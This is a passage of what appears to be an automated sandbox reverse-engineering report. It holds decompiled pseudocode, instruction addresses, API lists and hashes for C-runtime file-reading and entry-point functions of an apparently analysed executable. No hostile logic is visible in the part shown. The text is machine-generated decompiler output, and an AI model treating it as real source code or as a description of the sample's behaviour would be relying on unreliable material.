												 *((intOrPtr*)( *((intOrPtr*)(0x44c9f8 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t247;
												goto L32;
											}
											E00420DE2(GetLastError());
											 *( *((intOrPtr*)(0x44c9f8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x44c9f8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E0042671C( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t243);
									goto L21;
								} else {
									_t270 = E0042E4E7(_t204,  *_t189);
									__eflags = _t270;
									if(_t270 == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E00435D28();
									return _t270;
								}
							}
							_t274 = GetLastError();
							E00420DE2(_t274);
							 *( *((intOrPtr*)(0x44c9f8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x44c9f8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t255);
							__eflags = _t274;
							if(_t274 == 0) {
								 *((intOrPtr*)(E00420E3C())) = 0xd;
							}
							goto L2;
						}
						_t233 = _v48;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x44c9f8 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00420DE2(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t288 = _t281 - 0x18;
						_v48 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v28);
						_push(_a12);
						memcpy(_t288,  &_v52, _t238 << 2);
						_t196 = 0;
						_t255 = E0042E1EC();
						_t281 = _t288 + 0x2c;
						_v12 = _t255;
						__eflags = _t255 - 0xffffffff;
						if(_t255 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00420E29()) =  *_t184 & 0x00000000;
						 *_t189 = _t267;
						 *((intOrPtr*)(E00420E3C())) = 0x18;
						goto L2;
					}
				} else {
					 *(E00420E29()) =  *_t186 & 0x00000000;
					 *_a8 = _t267;
					L2:
					return  *((intOrPtr*)(E00420E3C()));
				}
			}


























































                                                      0x0042e6cb
                                                      0x0042e6ee
                                                      0x0042e6f2
                                                      0x0042e6f3
                                                      0x0042e6f3
                                                      0x0042e6f5
                                                      0x0042e6fb
                                                      0x0042e716
                                                      0x0042e71b
                                                      0x0042e71e
                                                      0x0042e720
                                                      0x0042e722
                                                      0x0042e741
                                                      0x0042e748
                                                      0x0042e74f
                                                      0x0042e752
                                                      0x0042e75e
                                                      0x0042e761
                                                      0x0042e769
                                                      0x0042e76a
                                                      0x0042e76d
                                                      0x0042e76d
                                                      0x0042e76f
                                                      0x0042e774
                                                      0x0042e776
                                                      0x0042e779
                                                      0x0042e781
                                                      0x0042e784
                                                      0x0042e7f1
                                                      0x0042e7f2
                                                      0x0042e7f8
                                                      0x0042e7fa
                                                      0x0042e843
                                                      0x0042e846
                                                      0x0042e84f
                                                      0x0042e852
                                                      0x0042e855
                                                      0x0042e857
                                                      0x0042e857
                                                      0x0042e857
                                                      0x0042e848
                                                      0x0042e84b
                                                      0x0042e84b
                                                      0x0042e85c
                                                      0x0042e85f
                                                      0x0042e86b
                                                      0x0042e870
                                                      0x0042e87c
                                                      0x0042e886
                                                      0x0042e88a
                                                      0x0042e894
                                                      0x0042e897
                                                      0x0042e8a2
                                                      0x0042e8a7
                                                      0x0042e8c6
                                                      0x0042e8c9
                                                      0x0042e8cd
                                                      0x0042e8ce
                                                      0x0042e8d4
                                                      0x0042e8d9
                                                      0x0042e8dc
                                                      0x0042e8de
                                                      0x0042e8e0
                                                      0x0042e8e5
                                                      0x0042e8e7
                                                      0x0042e8e9
                                                      0x0042e8ec
                                                      0x0042e8ee
                                                      0x0042e908
                                                      0x0042e92c
                                                      0x0042e930
                                                      0x0042e934
                                                      0x0042e936
                                                      0x0042e93a
                                                      0x0042e93c
                                                      0x0042e946
                                                      0x0042e949
                                                      0x0042e950
                                                      0x0042e950
                                                      0x0042e950
                                                      0x0042e950
                                                      0x0042e93a
                                                      0x0042e955
                                                      0x0042e961
                                                      0x0042e963
                                                      0x0042e9ee
                                                      0x0042e9ee
                                                      0x00000000
                                                      0x0042e969
                                                      0x0042e969
                                                      0x0042e96d
                                                      0x00000000
                                                      0x00000000
                                                      0x0042e972
                                                      0x0042e984
                                                      0x0042e98c
                                                      0x0042e98f
                                                      0x0042e990
                                                      0x0042e993
                                                      0x0042e99a
                                                      0x0042e99f
                                                      0x0042e9a2
                                                      0x0042e9d6
                                                      0x0042e9e0
                                                      0x0042e9e0
                                                      0x0042e9ea
                                                      0x00000000
                                                      0x0042e9ea
                                                      0x0042e9ab
                                                      0x0042e9c4
                                                      0x0042e9cb
                                                      0x0042e7eb
                                                      0x00000000
                                                      0x0042e7eb
                                                      0x0042e963
                                                      0x0042e8f0
                                                      0x00000000
                                                      0x0042e8a9
                                                      0x0042e8b0
                                                      0x0042e8b3
                                                      0x0042e8b5
                                                      0x00000000
                                                      0x00000000
                                                      0x0042e8b7
                                                      0x0042e8b9
                                                      0x0042e8b9
                                                      0x00000000
                                                      0x0042e8bf
                                                      0x0042e8a7
                                                      0x0042e802
                                                      0x0042e805
                                                      0x0042e820
                                                      0x0042e825
                                                      0x0042e82b
                                                      0x0042e82d
                                                      0x0042e838
                                                      0x0042e838
                                                      0x00000000
                                                      0x0042e82d
                                                      0x0042e786
                                                      0x0042e78d
                                                      0x0042e78f
                                                      0x0042e7c6
                                                      0x0042e7c6
                                                      0x0042e7d0
                                                      0x0042e7d3
                                                      0x0042e7da
                                                      0x0042e7da
                                                      0x0042e7da
                                                      0x0042e7e6
                                                      0x00000000
                                                      0x0042e7e6
                                                      0x0042e791
                                                      0x0042e795
                                                      0x00000000
                                                      0x00000000
                                                      0x0042e797
                                                      0x0042e7a6
                                                      0x0042e7ab
                                                      0x0042e7ae
                                                      0x0042e7af
                                                      0x0042e7b2
                                                      0x0042e7b2
                                                      0x0042e7b9
                                                      0x0042e7bb
                                                      0x0042e7be
                                                      0x0042e7c1
                                                      0x0042e7c4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0042e724
                                                      0x0042e729
                                                      0x0042e72c
                                                      0x0042e733
                                                      0x00000000
                                                      0x0042e733
                                                      0x0042e6fd
                                                      0x0042e702
                                                      0x0042e708
                                                      0x0042e70a
                                                      0x00000000
                                                      0x0042e70f

                                                      APIs
                                                        • Part of subcall function 0042E1EC: CreateFileW.KERNELBASE(00000000,?,?,tB,?,?,00000000,?,0042E774,?,0000000C), ref: 0042E209
                                                      • GetLastError.KERNEL32 ref: 0042E7DF
                                                      • __dosmaperr.LIBCMT ref: 0042E7E6
                                                      • GetFileType.KERNELBASE(00000000), ref: 0042E7F2
                                                      • GetLastError.KERNEL32 ref: 0042E7FC
                                                      • __dosmaperr.LIBCMT ref: 0042E805
                                                      • CloseHandle.KERNEL32(00000000), ref: 0042E825
                                                      • CloseHandle.KERNEL32(00421548), ref: 0042E972
                                                      • GetLastError.KERNEL32 ref: 0042E9A4
                                                      • __dosmaperr.LIBCMT ref: 0042E9AB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      • Opcode ID: 0f09a9e75157b84e4068a5192c67b3c07eff6167c1ac69e1b19006744794f239
                                                      • Instruction ID: ee299e0807c72f28b290fe01eb081898be5767cc198c08257fd44d168084831e
                                                      • Opcode Fuzzy Hash: 0f09a9e75157b84e4068a5192c67b3c07eff6167c1ac69e1b19006744794f239
                                                      • Instruction Fuzzy Hash: D7A13971B001649FCF199F69EC91BAE3BA1AB47314F58015FF8119B391C7398C52CB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004207EC Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 99 4207ec-4207fc 100 420816-420818 99->100 101 4207fe-420811 call 420e29 call 420e3c 99->101 103 42081e-420824 100->103 104 420b6c-420b79 call 420e29 call 420e3c 100->104 117 420b84 101->117 103->104 107 42082a-420856 103->107 122 420b7f call 41f16a 104->122 107->104 110 42085c-420865 107->110 113 420867-42087a call 420e29 call 420e3c 110->113 114 42087f-420881 110->114 113->122 115 420887-42088b 114->115 116 420b68-420b6a 114->116 115->116 120 420891-420895 115->120 121 420b87-420b8a 116->121 117->121 120->113 124 420897-4208ae 120->124 122->117 127 4208f3-4208f9 124->127 128 4208b0-4208b3 124->128 130 4208ca-4208e1 call 420e29 call 420e3c call 41f16a 127->130 131 4208fb-420902 127->131 132 4208c2-4208c8 128->132 133 4208b5-4208bd 128->133 165 420a9f 130->165 134 420906-420924 call 410766 call 41072c * 2 131->134 135 420904 131->135 132->130 137 4208e6-4208f1 132->137 136 420973-420986 133->136 170 420941-420969 call 41f88f 134->170 171 420926-42093c call 420e3c call 420e29 134->171 135->134 140 420a42-420a4b call 42d86f 136->140 141 42098c-420998 136->141 143 420970 137->143 155 420abc 140->155 156 420a4d-420a5f 140->156 141->140 145 42099e-4209a0 141->145 143->136 145->140 149 4209a6-4209c7 145->149 149->140 153 4209c9-4209df 149->153 153->140 159 4209e1-4209e3 153->159 161 420ac0-420ad6 ReadFile 155->161 156->155 157 420a61-420a70 GetConsoleMode 156->157 157->155 162 420a72-420a76 157->162 159->140 164 4209e5-420a08 159->164 166 420b34-420b3f GetLastError 161->166 167 420ad8-420ade 161->167 162->161 168 420a78-420a90 ReadConsoleW 162->168 164->140 172 420a0a-420a20 164->172 169 420aa2-420aac call 41072c 165->169 173 420b41-420b53 call 420e3c call 420e29 166->173 174 420b58-420b5b 166->174 167->166 175 420ae0 167->175 177 420a92 GetLastError 168->177 178 420ab1-420aba 168->178 169->121 170->143 171->165 172->140 183 420a22-420a24 172->183 173->165 179 420b61-420b63 174->179 180 420a98-420a9e call 420de2 174->180 176 420ae3-420af5 175->176 176->169 188 420af7-420afb 176->188 177->180 178->176 179->169 180->165 183->140 192 420a26-420a3d 183->192 194 420b14-420b21 188->194 195 420afd-420b0d call 420506 188->195 192->140 200 420b23 call 42065d 194->200 201 420b2d-420b32 call 420316 194->201 206 420b10-420b12 195->206 207 420b28-420b2b 200->207 201->207 206->169 207->206
                                                      C-Code - Quality: 77%
                                                      			E004207EC(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				signed int _v12;
				void* _v16;
				signed int _v20;
				long _v24;
				void* _v28;
				char _v32;
				void* _v36;
				long _v40;
				signed int* _t132;
				signed int _t134;
				signed int _t135;
				long _t138;
				signed int _t141;
				signed int _t143;
				signed char _t145;
				intOrPtr _t153;
				long _t155;
				signed int _t156;
				signed int _t157;
				signed int _t159;
				long _t160;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t168;
				signed int _t170;
				signed int _t172;
				char _t174;
				char _t179;
				char _t184;
				signed char _t191;
				long _t197;
				signed int _t200;
				intOrPtr _t203;
				long _t204;
				signed int _t205;
				unsigned int _t208;
				signed int _t210;
				signed int _t216;
				signed char _t217;
				long _t218;
				long _t219;
				void* _t220;
				signed int _t221;
				char* _t223;
				char* _t224;
				char* _t225;
				signed int _t230;
				signed int _t231;
				void* _t235;
				void* _t237;
				void* _t238;
				void* _t239;

				_t200 = _a4;
				_t238 = _t237 - 0x24;
				if(_t200 != 0xfffffffe) {
					__eflags = _t200;
					if(_t200 < 0) {
						L60:
						_t132 = E00420E29();
						 *_t132 =  *_t132 & 0x00000000;
						__eflags =  *_t132;
						 *((intOrPtr*)(E00420E3C())) = 9;
						L61:
						_t134 = E0041F16A();
						goto L62;
					}
					__eflags = _t200 -  *0x44cbf8; // 0x40
					if(__eflags >= 0) {
						goto L60;
					}
					_t216 = _t200 >> 6;
					_t230 = (_t200 & 0x0000003f) * 0x38;
					_v12 = _t216;
					_v32 = 1;
					_t138 =  *((intOrPtr*)(0x44c9f8 + _t216 * 4));
					_v24 = _t138;
					_v20 = _t230;
					_t217 =  *((intOrPtr*)(_t138 + _t230 + 0x28));
					_v5 = _t217;
					__eflags = 1 & _t217;
					if((1 & _t217) == 0) {
						goto L60;
					}
					_t218 = _a12;
					__eflags = _t218 - 0x7fffffff;
					if(_t218 <= 0x7fffffff) {
						__eflags = _t218;
						if(_t218 == 0) {
							L59:
							_t135 = 0;
							goto L63;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L59;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t141 =  *((intOrPtr*)(_t138 + _t230 + 0x29));
						_v5 = _t141;
						_v28 =  *((intOrPtr*)(_t138 + _t230 + 0x18));
						_t235 = 0;
						_t143 = _t141 - 1;
						__eflags = _t143;
						if(_t143 == 0) {
							_t145 =  !_t218;
							__eflags = 1 & _t145;
							if((1 & _t145) == 0) {
								L14:
								 *(E00420E29()) =  *_t146 & _t235;
								 *((intOrPtr*)(E00420E3C())) = 0x16;
								E0041F16A();
								goto L40;
							} else {
								_t219 = _t218 >> 1;
								_t197 = 4;
								__eflags = _t219 - 1;
								if(_t219 >= 1) {
									_t197 = _t219;
								}
								_t235 = E00410766(_t197);
								E0041072C(0);
								E0041072C(0);
								_t239 = _t238 + 0xc;
								_v16 = _t235;
								__eflags = _t235;
								if(_t235 != 0) {
									_t153 = E0041F88F(_t219, _a4, 0, 0, 1);
									_t238 = _t239 + 0x10;
									_t203 =  *((intOrPtr*)(0x44c9f8 + _v12 * 4));
									 *((intOrPtr*)(_t230 + _t203 + 0x20)) = _t153;
									 *(_t230 + _t203 + 0x24) = _t219;
									_t220 = _t235;
									_t155 =  *((intOrPtr*)(0x44c9f8 + _v12 * 4));
									L22:
									_v24 = _t155;
									L23:
									_t204 = _v24;
									_t230 = 0;
									_t156 = _v20;
									_v36 = _t220;
									__eflags =  *(_t156 + _t204 + 0x28) & 0x00000048;
									_t205 = _a4;
									if(( *(_t156 + _t204 + 0x28) & 0x00000048) != 0) {
										_t174 =  *((intOrPtr*)(_t156 + _v24 + 0x2a));
										_t223 = _v16;
										__eflags = _t174 - 0xa;
										if(_t174 != 0xa) {
											__eflags = _t197;
											if(_t197 != 0) {
												_t230 = 1;
												 *_t223 = _t174;
												_t224 = _t223 + 1;
												_t197 = _t197 - 1;
												__eflags = _v5;
												_v16 = _t224;
												 *((char*)(_v20 +  *((intOrPtr*)(0x44c9f8 + _v12 * 4)) + 0x2a)) = 0xa;
												_t205 = _a4;
												if(_v5 != 0) {
													_t179 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x44c9f8 + _v12 * 4)) + 0x2b));
													_t205 = _a4;
													__eflags = _t179 - 0xa;
													if(_t179 != 0xa) {
														__eflags = _t197;
														if(_t197 != 0) {
															 *_t224 = _t179;
															_t225 = _t224 + 1;
															_t197 = _t197 - 1;
															__eflags = _v5 - 1;
															_v16 = _t225;
															_t230 = 2;
															 *((char*)(_v20 +  *((intOrPtr*)(0x44c9f8 + _v12 * 4)) + 0x2b)) = 0xa;
															_t205 = _a4;
															if(_v5 == 1) {
																_t184 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x44c9f8 + _v12 * 4)) + 0x2c));
																_t205 = _a4;
																__eflags = _t184 - 0xa;
																if(_t184 != 0xa) {
																	__eflags = _t197;
																	if(_t197 != 0) {
																		 *_t225 = _t184;
																		_t197 = _t197 - 1;
																		__eflags = _t197;
																		_v16 = _t225 + 1;
																		_t230 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x44c9f8 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t157 = E0042D86F(_t205);
									__eflags = _t157;
									if(_t157 == 0) {
										L43:
										_v32 = 0;
										L44:
										_t198 = _v16;
										_t159 = ReadFile(_v28, _v16, _t197,  &_v24, 0); // executed
										__eflags = _t159;
										if(_t159 == 0) {
											L55:
											_t160 = GetLastError();
											_t230 = 5;
											__eflags = _t160 - _t230;
											if(_t160 != _t230) {
												__eflags = _t160 - 0x6d;
												if(_t160 != 0x6d) {
													L39:
													E00420DE2(_t160);
													goto L40;
												}
												_t231 = 0;
												goto L41;
											}
											 *((intOrPtr*)(E00420E3C())) = 9;
											 *(E00420E29()) = _t230;
											goto L40;
										}
										_t208 = _a12;
										__eflags = _v24 - _t208;
										if(_v24 > _t208) {
											goto L55;
										}
										_t231 = _t230 + _v24;
										__eflags = _t231;
										L47:
										_t221 = _v20;
										_t165 =  *((intOrPtr*)(0x44c9f8 + _v12 * 4));
										__eflags =  *((char*)(_t221 + _t165 + 0x28));
										if( *((char*)(_t221 + _t165 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v32;
												_push(_t231 >> 1);
												_push(_v36);
												_push(_a4);
												if(_v32 == 0) {
													_t166 = E00420316();
												} else {
													_t166 = E0042065D();
												}
											} else {
												_t209 = _t208 >> 1;
												__eflags = _t208 >> 1;
												_t166 = E00420506(_t208 >> 1, _t208 >> 1, _a4, _t198, _t231, _a8, _t209);
											}
											_t231 = _t166;
										}
										goto L41;
									}
									_t210 = _v20;
									_t168 =  *((intOrPtr*)(0x44c9f8 + _v12 * 4));
									__eflags =  *((char*)(_t210 + _t168 + 0x28));
									if( *((char*)(_t210 + _t168 + 0x28)) >= 0) {
										goto L43;
									}
									_t170 = GetConsoleMode(_v28,  &_v40);
									__eflags = _t170;
									if(_t170 == 0) {
										goto L43;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L44;
									}
									_t198 = _v16;
									_t172 = ReadConsoleW(_v28, _v16, _t197 >> 1,  &_v24, 0);
									__eflags = _t172;
									if(_t172 != 0) {
										_t208 = _a12;
										_t231 = _t230 + _v24 * 2;
										goto L47;
									}
									_t160 = GetLastError();
									goto L39;
								} else {
									 *((intOrPtr*)(E00420E3C())) = 0xc;
									 *(E00420E29()) = 8;
									L40:
									_t231 = _t230 | 0xffffffff;
									__eflags = _t231;
									L41:
									E0041072C(_t235);
									_t135 = _t231;
									goto L63;
								}
							}
						}
						__eflags = _t143 == 1;
						if(_t143 == 1) {
							_t191 =  !_t218;
							__eflags = 1 & _t191;
							if((1 & _t191) != 0) {
								_t155 = _v24;
								_t197 = _t218;
								_t220 = _a8;
								_v16 = _t220;
								goto L22;
							}
							goto L14;
						} else {
							_t197 = _t218;
							_t220 = _a8;
							_v16 = _t220;
							goto L23;
						}
					}
					L6:
					 *(E00420E29()) =  *_t139 & 0x00000000;
					 *((intOrPtr*)(E00420E3C())) = 0x16;
					goto L61;
				} else {
					 *(E00420E29()) =  *_t192 & 0x00000000;
					_t134 = E00420E3C();
					 *_t134 = 9;
					L62:
					_t135 = _t134 | 0xffffffff;
					L63:
					return _t135;
				}
			}
























































                                                      0x004207f1
                                                      0x004207f4
                                                      0x004207fc
                                                      0x00420816
                                                      0x00420818
                                                      0x00420b6c
                                                      0x00420b6c
                                                      0x00420b71
                                                      0x00420b71
                                                      0x00420b79
                                                      0x00420b7f
                                                      0x00420b7f
                                                      0x00000000
                                                      0x00420b7f
                                                      0x0042081e
                                                      0x00420824
                                                      0x00000000
                                                      0x00000000
                                                      0x0042082e
                                                      0x00420834
                                                      0x00420839
                                                      0x0042083d
                                                      0x00420840
                                                      0x00420847
                                                      0x0042084a
                                                      0x0042084d
                                                      0x00420851
                                                      0x00420854
                                                      0x00420856
                                                      0x00000000
                                                      0x00000000
                                                      0x0042085c
                                                      0x0042085f
                                                      0x00420865
                                                      0x0042087f
                                                      0x00420881
                                                      0x00420b68
                                                      0x00420b68
                                                      0x00000000
                                                      0x00420b68
                                                      0x00420887
                                                      0x0042088b
                                                      0x00000000
                                                      0x00000000
                                                      0x00420891
                                                      0x00420895
                                                      0x00000000
                                                      0x00000000
                                                      0x0042089c
                                                      0x004208a0
                                                      0x004208a3
                                                      0x004208a6
                                                      0x004208ab
                                                      0x004208ab
                                                      0x004208ae
                                                      0x004208f5
                                                      0x004208f7
                                                      0x004208f9
                                                      0x004208ca
                                                      0x004208cf
                                                      0x004208d6
                                                      0x004208dc
                                                      0x00000000
                                                      0x004208fb
                                                      0x004208fd
                                                      0x004208ff
                                                      0x00420900
                                                      0x00420902
                                                      0x00420904
                                                      0x00420904
                                                      0x0042090e
                                                      0x00420910
                                                      0x00420917
                                                      0x0042091c
                                                      0x0042091f
                                                      0x00420922
                                                      0x00420924
                                                      0x0042094a
                                                      0x00420952
                                                      0x00420955
                                                      0x0042095c
                                                      0x00420963
                                                      0x00420967
                                                      0x00420969
                                                      0x00420970
                                                      0x00420970
                                                      0x00420973
                                                      0x00420973
                                                      0x00420976
                                                      0x00420978
                                                      0x0042097b
                                                      0x0042097e
                                                      0x00420983
                                                      0x00420986
                                                      0x0042098f
                                                      0x00420993
                                                      0x00420996
                                                      0x00420998
                                                      0x0042099e
                                                      0x004209a0
                                                      0x004209a9
                                                      0x004209aa
                                                      0x004209ac
                                                      0x004209b0
                                                      0x004209b1
                                                      0x004209b5
                                                      0x004209bf
                                                      0x004209c4
                                                      0x004209c7
                                                      0x004209d6
                                                      0x004209da
                                                      0x004209dd
                                                      0x004209df
                                                      0x004209e1
                                                      0x004209e3
                                                      0x004209e8
                                                      0x004209ea
                                                      0x004209ee
                                                      0x004209ef
                                                      0x004209f5
                                                      0x004209ff
                                                      0x00420a00
                                                      0x00420a05
                                                      0x00420a08
                                                      0x00420a17
                                                      0x00420a1b
                                                      0x00420a1e
                                                      0x00420a20
                                                      0x00420a22
                                                      0x00420a24
                                                      0x00420a26
                                                      0x00420a2c
                                                      0x00420a2c
                                                      0x00420a2d
                                                      0x00420a3c
                                                      0x00420a3d
                                                      0x00420a3d
                                                      0x00420a24
                                                      0x00420a20
                                                      0x00420a08
                                                      0x004209e3
                                                      0x004209df
                                                      0x004209c7
                                                      0x004209a0
                                                      0x00420998
                                                      0x00420a43
                                                      0x00420a49
                                                      0x00420a4b
                                                      0x00420abc
                                                      0x00420abc
                                                      0x00420ac0
                                                      0x00420ac7
                                                      0x00420ace
                                                      0x00420ad4
                                                      0x00420ad6
                                                      0x00420b34
                                                      0x00420b34
                                                      0x00420b3c
                                                      0x00420b3d
                                                      0x00420b3f
                                                      0x00420b58
                                                      0x00420b5b
                                                      0x00420a98
                                                      0x00420a99
                                                      0x00000000
                                                      0x00420a9e
                                                      0x00420b61
                                                      0x00000000
                                                      0x00420b61
                                                      0x00420b46
                                                      0x00420b51
                                                      0x00000000
                                                      0x00420b51
                                                      0x00420ad8
                                                      0x00420adb
                                                      0x00420ade
                                                      0x00000000
                                                      0x00000000
                                                      0x00420ae0
                                                      0x00420ae0
                                                      0x00420ae3
                                                      0x00420ae6
                                                      0x00420ae9
                                                      0x00420af0
                                                      0x00420af5
                                                      0x00420af7
                                                      0x00420afb
                                                      0x00420b16
                                                      0x00420b1a
                                                      0x00420b1b
                                                      0x00420b1e
                                                      0x00420b21
                                                      0x00420b2d
                                                      0x00420b23
                                                      0x00420b23
                                                      0x00420b23
                                                      0x00420afd
                                                      0x00420afd
                                                      0x00420afd
                                                      0x00420b08
                                                      0x00420b0d
                                                      0x00420b10
                                                      0x00420b10
                                                      0x00000000
                                                      0x00420af5
                                                      0x00420a50
                                                      0x00420a53
                                                      0x00420a5a
                                                      0x00420a5f
                                                      0x00000000
                                                      0x00000000
                                                      0x00420a68
                                                      0x00420a6e
                                                      0x00420a70
                                                      0x00000000
                                                      0x00000000
                                                      0x00420a72
                                                      0x00420a76
                                                      0x00000000
                                                      0x00000000
                                                      0x00420a81
                                                      0x00420a88
                                                      0x00420a8e
                                                      0x00420a90
                                                      0x00420ab4
                                                      0x00420ab7
                                                      0x00000000
                                                      0x00420ab7
                                                      0x00420a92
                                                      0x00000000
                                                      0x00420926
                                                      0x0042092b
                                                      0x00420936
                                                      0x00420a9f
                                                      0x00420a9f
                                                      0x00420a9f
                                                      0x00420aa2
                                                      0x00420aa3
                                                      0x00420aa9
                                                      0x00000000
                                                      0x00420aab
                                                      0x00420924
                                                      0x004208f9
                                                      0x004208b0
                                                      0x004208b3
                                                      0x004208c4
                                                      0x004208c6
                                                      0x004208c8
                                                      0x004208e6
                                                      0x004208e9
                                                      0x004208eb
                                                      0x004208ee
                                                      0x00000000
                                                      0x004208ee
                                                      0x00000000
                                                      0x004208b5
                                                      0x004208b5
                                                      0x004208b7
                                                      0x004208ba
                                                      0x00000000
                                                      0x004208ba
                                                      0x004208b3
                                                      0x00420867
                                                      0x0042086c
                                                      0x00420874
                                                      0x00000000
                                                      0x004207fe
                                                      0x00420803
                                                      0x00420806
                                                      0x0042080b
                                                      0x00420b84
                                                      0x00420b84
                                                      0x00420b87
                                                      0x00420b8a
                                                      0x00420b8a

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eaaf7dfa0add38774a94ec6274f1728a4918b501ac427f52a4c99bbcaa12c69b
                                                      • Instruction ID: 26825933e59cda457d30337bc96510de6499cbecc203a4f23eadf1efa2dddb9b
                                                      • Opcode Fuzzy Hash: eaaf7dfa0add38774a94ec6274f1728a4918b501ac427f52a4c99bbcaa12c69b
                                                      • Instruction Fuzzy Hash: 6DB126B4B00219AFDB11DF99E880BAE7BF1AF55304F94415AE40467393C7789D82CB6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402B24 Relevance: 9.1, APIs: 6, Instructions: 105COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 83%
                                                      			_entry_(void* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t18;
				intOrPtr* _t19;
				void* _t21;
				char _t22;
				char _t28;
				intOrPtr _t30;
				void* _t32;
				char _t35;
				void* _t36;
				intOrPtr* _t40;
				void* _t48;
				intOrPtr* _t51;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				void* _t56;

				_t48 = __edi;
				_t47 = __edx;
				_t36 = __ecx;
				E00403097();
				E00403400(__edx, 0x448100, 0x14);
				_t11 = E00402E77(_t36, __edx, 1); // executed
				if(_t11 != 0) {
					L3:
					_t35 = 0;
					 *((char*)(_t56 - 0x19)) = 0;
					 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
					 *((char*)(_t56 - 0x24)) = E00402D7A();
					_t13 =  *0x44bbe0; // 0x2
					if(_t13 == 1) {
						goto L2;
					}
					if(_t13 != 0) {
						_t35 = 1;
						 *((char*)(_t56 - 0x19)) = 1;
						L9:
						E00402FD1( *((intOrPtr*)(_t56 - 0x24)));
						_pop(_t40);
						_t51 = E004031A7();
						__eflags =  *_t51;
						if(__eflags != 0) {
							_t30 = E00402F47(__eflags);
							_t40 = _t51;
							__eflags = _t30;
							if(_t30 != 0) {
								_t55 =  *_t51;
								_t40 = _t55;
								L004033F0();
								 *_t55(0, 2, 0);
							}
						}
						_t52 = E004031AD();
						__eflags =  *_t52;
						if(__eflags != 0) {
							_t28 = E00402F47(__eflags);
							_t40 = _t52;
							__eflags = _t28;
							if(_t28 != 0) {
								_push( *_t52);
								E0040E041(_t35, _t47, 0, _t52);
								_pop(_t40);
							}
						}
						_t18 = E0040E2FC();
						_t19 = E0040E2F6();
						_push(E0040DBF2());
						_t21 = E004024CF(_t20, _t40, _t47,  *_t19,  *_t18); // executed
						_t54 = _t21;
						_t22 = E00403301();
						__eflags = _t22;
						if(_t22 == 0) {
							E0040E067(_t54);
						}
						__eflags = _t35;
						if(_t35 == 0) {
							E0040E015();
						}
						E00402FEE(_t40, 1, 0);
						 *(_t56 - 4) = 0xfffffffe;
						L20:
						return E00403446(_t47);
					}
					 *0x44bbe0 = 1;
					_t32 = E0040DC3B(0x4403ac, 0x4403c8); // executed
